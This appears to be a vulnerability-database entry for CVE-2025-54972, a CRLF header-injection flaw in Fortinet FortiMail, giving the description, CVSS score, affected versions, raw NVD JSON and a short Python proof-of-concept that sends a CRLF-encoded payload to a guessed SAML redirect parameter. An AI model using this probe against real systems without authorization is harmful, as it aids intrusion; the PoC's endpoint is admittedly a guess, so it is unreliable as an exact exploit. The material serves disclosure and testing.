Security Vulnerability Report
中文
CVE-2025-54972 CVSS 4.3 MEDIUM

CVE-2025-54972

Published: 2025-11-18 17:16:04
Last Modified: 2026-01-14 10:16:06
Source: [email protected]

Description

An improper neutralization of crlf sequences ('crlf injection') vulnerability in Fortinet FortiMail 7.6.0 through 7.6.3, FortiMail 7.4.0 through 7.4.5, FortiMail 7.2 all versions, FortiMail 7.0 all versions may allow an attacker to inject headers in the response via convincing a user to click on a specifically crafted link

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortimail:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortimail:*:*:*:*:*:*:*:* - VULNERABLE
FortiMail 7.0.x - 所有版本
FortiMail 7.2.x - 所有版本
FortiMail 7.4.0 - 7.4.5
FortiMail 7.6.0 - 7.6.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import urllib.parse # CVE-2025-54972 CRLF Injection PoC # Target: FortiMail < 7.4.6, < 7.6.4 def test_crlf_injection(url): """ Test for CRLF injection vulnerability in FortiMail Inject malicious headers via crafted URL parameters """ # Malicious payload with CRLF sequences # %0d%0a = \r\n (URL encoded CRLF) payload = "%0d%0aX-Injected-Header: malicious-value" # Target endpoint - adjust based on actual vulnerable parameter target_url = f"{url}/fcgi/saml2?redirect={payload}" try: response = requests.get(target_url, timeout=10) # Check if injected header appears in response if 'X-Injected-Header' in response.headers: print(f"[+] VULNERABLE: CRLF injection detected!") print(f"[+] Injected header: {response.headers.get('X-Injected-Header')}") return True else: print(f"[-] Not vulnerable or payload not reflected") return False except requests.RequestException as e: print(f"[!] Error: {e}") return False # Example usage if __name__ == "__main__": target = "https://vulnerable-fortimail.example.com" test_crlf_injection(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54972", "sourceIdentifier": "[email protected]", "published": "2025-11-18T17:16:03.890", "lastModified": "2026-01-14T10:16:06.210", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An improper neutralization of crlf sequences ('crlf injection') vulnerability in Fortinet FortiMail 7.6.0 through 7.6.3, FortiMail 7.4.0 through 7.4.5, FortiMail 7.2 all versions, FortiMail 7.0 all versions may allow an attacker to inject headers in the response via convincing a user to click on a specifically crafted link"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-93"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortimail:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.4.6", "matchCriteriaId": "5982EF2E-C0FD-4FEB-B275-A69EAE436C17"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortimail:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.4", "matchCriteriaId": "6F11D4E8-2671-408A-8028-005ABD367084"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-634", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.